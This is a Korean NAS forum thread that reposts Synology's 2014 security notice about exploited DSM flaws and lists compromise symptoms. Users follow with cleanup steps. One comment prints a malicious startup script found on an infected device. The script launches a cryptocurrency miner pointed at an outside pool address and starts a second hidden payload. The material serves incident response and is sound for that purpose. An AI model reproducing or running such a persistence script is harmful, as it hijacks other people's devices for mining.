최근 해킹 관련으로 시놀로지로부터의 공지메일

쓰기

최근 해킹 관련으로 시놀로지로부터의 공지메일

2014-02

2014-02-18 07:51:50

조회 6855 추천 1

DSM Important UpdateDear Synology users,

Synology®?confirmed known security issues (reported as CVE-2013-6955 and CVE-2013-6987) which would cause compromise to file access authority in DSM. An updated DSM version resolving these issues has been released accordingly.

The followings are possible symptoms to appear on affected DiskStation and RackStation:

Exceptionally high CPU usage detected in Resource Monitor:
CPU resource occupied by processes such as dhcp.pid, minerd, synodns, PWNED, PWNEDb, PWNEDg, PWNEDm, or any processes with PWNED in their namesAppearance of non-Synology folder:
An automatically created shared folder with the name “startup”, or a non-Synology folder appearing under the path of “/root/PWNED”Redirection of the Web Station:
“Index.php” is redirected to an unexpected pageAppearance of non-Synology CGI program:
Files with meaningless names exist under the path of “/usr/syno/synoman”Appearance of non-Synology script file:
Non-Synology script files, such as?“S99p.sh”, appear under the path of “/usr/syno/etc/rc.d”

If users identify any of above situation, they are strongly encouraged to do the following:

For DiskStation or RackStation running on DSM 4.3, please follow the instruction?here?to REINSTALL?DSM 4.3-3827For DiskStation or RackStation running on DSM 4.0, it’s recommended to REINSTALL DSM 4.0-2259 or onward from Synology?Download CenterFor DiskStation or RackStation running on DSM 4.1 or DSM 4.2, it’s recommended to REINSTALL DSM 4.2-3243 or onward from Synology?Download Center

For other users who haven’t encountered above symptoms, it is recommended to go to
DSM > Control Panel > DSM Update?page, update to versions above to protect DiskStation from malicious attacks.

Synology has taken immediate actions to fix vulnerability at the point of identifying malicious attacks. As proliferation of cybercrime and increasingly sophisticated malware evolves, Synology continues to casting resources mitigating threats and dedicates to providing the most reliable solutions for users. If users still notice their DiskStation behaving suspiciously after being upgraded to the latest DSM version, please contact?********@********.com.

Sincerely,
Synology Development Team

?Copyright ? 2014 Synology Inc. All Rights Reserved. All other product names and company names
or logos mentioned in the e-mail are the properties of their respective ownerswww.synology.comPrivacy Policy

벌써 50대

짧은글 일수록 신중하게.



오나기 2014-02 거의 전부 해당사항이 있어서 큰일이네요 ㅜ.ㅜ; 정품을 사용하자니 돈과 스펙이 안따라주고.. 일단 아래처럼 해주면 CPU사용율을 되돌릴 수 있습니다. ## S99p.sh를 찾아서 내용 확인하고 지웁니다. 내용에서 확인되는 PWNED는 소심하게 이름을 바꿨어요. > cd / > find / -name S99p.sh /usr/syno/etc.defaults/rc.d/S99p.sh > cat /usr/syno/etc.defaults/rc.d/S99p.sh #!/bin/sh su -c "cd /PWNED && ./PWNEDm -o 'stratum+tcp://46.244.18.176:9555' &" -s /bin/sh smmsp su -c "cd /PWNED && ./PWNEDb &" -s /bin/sh smmsp >mv PWNED PWNED_bak >rm /usr/syno/etc.defaults/rc.d/S99p.sh ## CPU를 점거하는 백그라운드 프로세스를 찾아봅니다. >find /proc -name "stat" \| xargs grep "httpd-log.pid" ## 위 검색 결과에서 맨위 파일(PID)을 kill하면 나머지도 kill됩니다. >kill 검색된 PID 원초적인 해결방법을 아시는 능력자께선 정보 공유좀 부탁드립니다! (__) 거의 전부 해당사항이 있어서 큰일이네요 ㅜ.ㅜ; 정품을 사용하자니 돈과 스펙이 안따라주고.. 일단 아래처럼 해주면 CPU사용율을 되돌릴 수 있습니다. ## S99p.sh를 찾아서 내용 확인하고 지웁니다. 내용에서 확인되는 PWNED는 소심하게 이름을 바꿨어요. > cd / > find / -name S99p.sh /usr/syno/etc.defaults/rc.d/S99p.sh > cat /usr/syno/etc.defaults/rc.d/S99p.sh #!/bin/sh su -c "cd /PWNED && ./PWNEDm -o 'stratum+tcp://46.244.18.176:9555' &" -s /bin/sh smmsp su -c "cd /PWNED && ./PWNEDb &" -s /bin/sh smmsp >mv PWNED PWNED_bak >rm /usr/syno/etc.defaults/rc.d/S99p.sh ## CPU를 점거하는 백그라운드 프로세스를 찾아봅니다. >find /proc -name "stat" \| xargs grep "httpd-log.pid" ## 위 검색 결과에서 맨위 파일(PID)을 kill하면 나머지도 kill됩니다. >kill 검색된 PID 원초적인 해결방법을 아시는 능력자께선 정보 공유좀 부탁드립니다! (__)



강성진00 2014-02 보안구멍이 파일스테이션 쪽 cgi 라고 하더군요. 정품 유저라면. 최신버젼 업데이트 하면 간단히 해결되지만. 해놀 사용중이라면 어쩔 수 없이 외부포트 오픈을 포기 하거나.. 파일스테이션을 포기하거나.. 이렇게 둘 중 하나는 포기 해야만 합니다. ----- 파일스테이션 작동 막는 방법은 아래 글에 있습니다. http://www.2cpu.co.kr/bbs/board.php?bo_table=nas&wr_id=1988 보안구멍이 파일스테이션 쪽 cgi 라고 하더군요. 정품 유저라면. 최신버젼 업데이트 하면 간단히 해결되지만. 해놀 사용중이라면 어쩔 수 없이 외부포트 오픈을 포기 하거나.. 파일스테이션을 포기하거나.. 이렇게 둘 중 하나는 포기 해야만 합니다. ----- 파일스테이션 작동 막는 방법은 아래 글에 있습니다. http://www.2cpu.co.kr/bbs/board.php?bo_table=nas&wr_id=1988



김준유 2014-02 정품 사용자라.... 정품 사용자라....



이철우275 2014-02 요기 올라온 cgi 이름 교체하는 방법으로 일단 회피했구요. (저는 imageSelector.cgi 하나밖에 일치하는게 없더군요 4.2라서 그런가?) /usr/syno/etc.defaults/rc.d/S99p.sh 파일 PWNED 폴더 lolz 폴더 /etc/rc.local 파일 일단은 그냥 이름 바꿔놨네요. 요기 올라온 cgi 이름 교체하는 방법으로 일단 회피했구요. (저는 imageSelector.cgi 하나밖에 일치하는게 없더군요 4.2라서 그런가?) /usr/syno/etc.defaults/rc.d/S99p.sh 파일 PWNED 폴더 lolz 폴더 /etc/rc.local 파일 일단은 그냥 이름 바꿔놨네요.



박종령 2014-02 만약 lolz 로 걸렸다면 top 등을 실행하시면 그 폴더에 있던 걸로 실행 되는 듯 하기도 하네요.. 폴더 지우고 cgi 이름들 바꾸고 우선 임시로 했네요. 저는 .. 4대 돌리는 중인데 업데이트 안했던게 걸린거 같더군요. 임시로 하긴 했지만.. 아직도 불안합니다. 부팅 USB 를 새로 작성 하셔서 하시길 권해드립니다. 메인으로 쓰던 게 부팅할 때 보니 lolz 찾는거 같더군요.. 우선 부팅 USB 부터 새로 만드시길.... 만약 lolz 로 걸렸다면 top 등을 실행하시면 그 폴더에 있던 걸로 실행 되는 듯 하기도 하네요.. 폴더 지우고 cgi 이름들 바꾸고 우선 임시로 했네요. 저는 .. 4대 돌리는 중인데 업데이트 안했던게 걸린거 같더군요. 임시로 하긴 했지만.. 아직도 불안합니다. 부팅 USB 를 새로 작성 하셔서 하시길 권해드립니다. 메인으로 쓰던 게 부팅할 때 보니 lolz 찾는거 같더군요.. 우선 부팅 USB 부터 새로 만드시길....



송강민 2014-02 온갖 rc파일 .profile에 lolz관련 스크립트들이 유입되어 있더라구요 저는 리소스 모니터도 안되고 정상적으로 사용이 불가하여 재설치 했습니다. 온갖 rc파일 .profile에 lolz관련 스크립트들이 유입되어 있더라구요 저는 리소스 모니터도 안되고 정상적으로 사용이 불가하여 재설치 했습니다.

로그인 하시면 댓글을 남길 수 있습니다

쓰기

NAS

쓰기

285/303

번호	제목Page 285/303	글쓴이	날짜	조회	추천
	[필독] 처음 오시는 분을 위한 안내 (716)	정은준1	2014-05	4491284	0
[필독] 처음 오시는 분을 위한 안내 (716) 2014-05 4491284 1 정은준1
	(광고) 단통법 시대의 인터넷가입 가이드(ver2.0) (228)	백메가	2015-12	1043796	25
(광고) 단통법 시대의 인터넷가입 가이드(… (228) 2015-12 1043796 1 백메가
368	5.0 올렸을때 문제점이 좀 있네요. (5)	애교콩	2014-02	4391	1
5.0 올렸을때 문제점이 좀 있네요. (5) 2014-02 4391 1 애교콩
367	XPEnology_DS3612xs_3810-repack-trantor-v1.0 에서 마이너 업데이트인 version 4를 … (2)	허성훈	2014-02	5441	0
XPEnology_DS3612xs_3810-repack-trantor-… (2) 2014-02 5441 1 허성훈
366	Gen8 나스 한달 돌리고 난 뒤. 전기세 증가분 (10)	돼지털스	2014-02	15046	1
Gen8 나스 한달 돌리고 난 뒤. 전기세 증… (10) 2014-02 15046 1 돼지털스
365	dsm 5.0은 구성 백업,복원이 없군요. (1)	애교콩	2014-02	4571	1
dsm 5.0은 구성 백업,복원이 없군요. (1) 2014-02 4571 1 애교콩
364	시놀로지에 대한 신뢰도가 팍팍 떨어지고 있어요. (2)	성기사	2014-02	5783	1
시놀로지에 대한 신뢰도가 팍팍 떨어지고 … (2) 2014-02 5783 1 성기사
363	비트코인 해킹에 대처한 (지극히 개인적인) 성공담 (7)	오나기	2014-02	6802	0
비트코인 해킹에 대처한 (지극히 개인적인… (7) 2014-02 6802 1 오나기
362	DSM 5.0 업데이트 불가? (2)	성바오로	2014-02	5562	0
DSM 5.0 업데이트 불가? (2) 2014-02 5562 1 성바오로
361	하아 저도 뚫렸내요. (2)	만곰이	2014-02	5622	1
하아 저도 뚫렸내요. (2) 2014-02 5622 1 만곰이
360	4.x 버전 임시해결책 올린거... (1)	Ryun	2014-02	4737	0
4.x 버전 임시해결책 올린거... (1) 2014-02 4737 1 Ryun
359	DSM 5.0 설치를 해보았는데요	니포	2014-02	5197	0
DSM 5.0 설치를 해보았는데요 2014-02 5197 1 니포
358	XPEnology 4.3 3810 update 4 로 업데이트 하는 법 (3827 로 안하고) (7)	에드아인	2014-02	11628	1
XPEnology 4.3 3810 update 4 로 업데이트… (7) 2014-02 11628 1 에드아인
357	학기도 시작하고 NAS구축 하고싶은데 (3)	이해찬	2014-02	4194	0
학기도 시작하고 NAS구축 하고싶은데 (3) 2014-02 4194 1 이해찬
356	DSM5.0은 해킹으로 부터 안전한지요? (2)	달봉이	2014-02	5533	1
DSM5.0은 해킹으로 부터 안전한지요? (2) 2014-02 5533 1 달봉이
355	시놀로지 해킹- DSM 3.x 버전은 어찌해야 하나요?	김훈1	2014-02	4767	0
시놀로지 해킹- DSM 3.x 버전은 어찌해야 … 2014-02 4767 1 김훈1
354	xpenology에 vm tools를 설치하였는데요.. (2)	니포	2014-02	6116	0
xpenology에 vm tools를 설치하였는데요.. (2) 2014-02 6116 1 니포
353	해킹 작동 확인 방법이 어떻게 되는지요? (9)	돼지털스	2014-02	5603	1
해킹 작동 확인 방법이 어떻게 되는지요? (9) 2014-02 5603 1 돼지털스
352	Xpenology의 4.2 버전에서 해킹 후 대응 (7)	송상병	2014-02	6764	0
Xpenology의 4.2 버전에서 해킹 후 대응 (7) 2014-02 6764 1 송상병
351	EXSI 5.5에 DSM5.0 베타로 업그레이드 했습니다.(vmware-tools문제..) (7)	송강민	2014-02	6118	0
EXSI 5.5에 DSM5.0 베타로 업그레이드 했… (7) 2014-02 6118 1 송강민
350	최근 해킹 관련으로 시놀로지로부터의 공지메일 (6)	김준유	2014-02	6856	1
최근 해킹 관련으로 시놀로지로부터의 공… (6) 2014-02 6856 1 김준유
349	[질문]xpenology 운영시 HW 레이드 카드의 레이드 문제점을 어떻게 체크 해야 하나요? (4)	안승현	2014-02	4229	1
[질문]xpenology 운영시 HW 레이드 카드의… (4) 2014-02 4229 1 안승현